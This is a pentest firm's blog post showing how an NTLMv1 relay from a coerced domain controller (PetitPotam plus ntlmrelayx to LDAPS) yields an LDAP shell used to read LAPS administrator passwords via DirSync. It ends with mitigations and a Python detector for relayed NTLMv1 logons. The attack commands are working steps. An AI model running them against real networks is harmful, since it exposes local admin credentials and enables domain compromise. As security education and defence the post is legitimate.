Defeat LAPS with NTLMv1-Relay

Pentest Team @greenhats.com
Oct 13, 2022


In our internal pentests, relay attacks that use the NTLMv1 protocol are still successful (unfortunately). Many older systems cannot be converted to better methods such as Kerberos, so a large number of attacks against NTLMv1 are still possible.

The two most common attacks are explained on the following blog entry: https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/

In our scenario we assume that the other methods are not working and that LAPS is in use in the domain. We will also not discuss cracking the captured hash with hashcat or crack.sh.

The attack works in many corporate networks, since almost all of the prerequisites are default settings or common:

  • two domain controllers (with Windows Server 2012 functional level)
  • LDAP signing not required on the domain controllers (default)
  • NTLMv1 activated on DC (often found)
  • one of the domain controllers must reach the attacker system via port 445 (SMB) (often possible)
  • one of the domain controllers can be coerced into authenticating to the attacker system via PetitPotam, PrinterNightmare, Coercer etc. (it is rare that all fixes and workarounds are implemented)
  • NTLM authentication should be globally active (default)
  • LAPS enabled (fortunately already implemented in many infrastructures)
Outline of the attack (diagram created with https://whimsical.com, love this tool)

1. Trigger the SMB connection and NTLM authentication via PetitPotam

ntlmrelayx.py -t ldaps://dc2.domain.local --remove-mic -smb2support -i

python PetitPotam.py -pipe all LOCAL-IP dc1.domain.local

2. Authenticate via SMB with DC1$, relay the session and use the LDAP shell

[*] SMBD-Thread-5 (process_request_thread): Received connection from x.x.x.x, attacking target ldaps://dc2.domain.local

3. Relay the authentication to LDAPS and receive an interactive LDAP shell as DC1$

[*] Authenticating against ldaps://dc2.domain.local as DOMAIN/DC1$ SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000

Connect to LDAP shell using ncat

ncat 127.0.0.1 11000

4. Obtain LAPS password via DirSync method

To read the LAPS password (ms-Mcs-AdmPwd), special permissions are required, which the computer object of a domain controller usually does not have. Thus, the native LDAP shell function “get_laps_password” cannot be used directly. A DCSync cannot be executed with this session either, since it is not performed exclusively over the LDAP protocol and also requires a signed session, which the preceding relay attack does not provide.

A remedy here can be the “DirSync” function, which allows targeted synchronization of objects via LDAP.

This functionality has been implemented (as of 10/13/2022) via a still open PR in the “impacket” toolkit.

After updating the file “ldap_shell.py” according to the referenced code, the LAPS password of the computer named “COMPUTER123$” can be obtained using the following command:

dirsync "(sAMAccountName=COMPUTER123$)" "ms-Mcs-AdmPwd"

Mitigations

The attack can be effectively stopped in several ways.

  1. Firewall layer (network segmentation): Blocking connections via port 445 from any domain controller outbound to any client network
  2. Global disabling of NTLM or disable NTLMv1
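As an added example (not from the original post and not impacket code), the following Python checker shows how a defender would spot this attack in Security event 4624 data on the relay target: the relayed bind appears on DC2 as a network logon of DC1$ over NTLM from the attacker's address, and an LmPackageName of "NTLM V1" shows that NTLMv1 is still accepted. The ACCOUNT_HOSTS mapping and the sample events are constructed assumptions for the example.

```python
from dataclasses import dataclass

# Constructed mapping: each machine account and the address it should log on from.
# A defender would fill this from inventory; it is an assumption of this example.
ACCOUNT_HOSTS = {"DC1$": "10.0.0.11", "DC2$": "10.0.0.12"}


@dataclass
class Finding:
    severity: str
    account: str
    source_ip: str
    reason: str


def analyze_4624(events, account_hosts=ACCOUNT_HOSTS):
    """Inspect 4624 EventData dicts (string values, as exported by a SIEM) and flag
    network logons (type 3) that either used NTLMv1 or show a machine account
    authenticating from an address other than its own host (relay indicator)."""
    findings = []
    for ev in events:
        if ev.get("LogonType") != "3" or ev.get("AuthenticationPackageName") != "NTLM":
            continue  # Kerberos and interactive logons are not relay candidates
        account = ev.get("TargetUserName", "")
        ip = ev.get("IpAddress", "")
        if ev.get("LmPackageName") == "NTLM V1":
            findings.append(Finding("high", account, ip,
                                    "NTLMv1 accepted: LmCompatibilityLevel too low"))
        expected = account_hosts.get(account)
        if account.endswith("$") and expected and ip != expected:
            findings.append(Finding("critical", account, ip,
                                    f"machine account from {ip}, expected {expected}"))
    return findings


# Constructed sample events: the first is what the relay target (DC2) would log
# when DC1$ is relayed from the attacker host 10.0.0.50 over LDAPS.
SAMPLE_EVENTS = [
    {"TargetUserName": "DC1$", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V1", "IpAddress": "10.0.0.50"},
    {"TargetUserName": "jdoe", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "IpAddress": "10.0.0.77"},
    {"TargetUserName": "DC2$", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "LmPackageName": "NTLM V2", "IpAddress": "10.0.0.12"},
    {"TargetUserName": "svc_backup", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-", "IpAddress": "10.0.0.9"},
]

if __name__ == "__main__":
    for f in analyze_4624(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.account} from {f.source_ip}: {f.reason}")
```

On a real estate the same two conditions map directly to the mitigations above: the "high" finding disappears once NTLMv1 is refused, and the "critical" one once the coercion path (DC outbound 445) is blocked.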

More information on NTLMv1

Thanks for reading. Cheers.


evait security GmbH (aka pentest team of greenhats): full time white hacking / pentesting company who always stays on bleeding edge - https://www.greenhats.com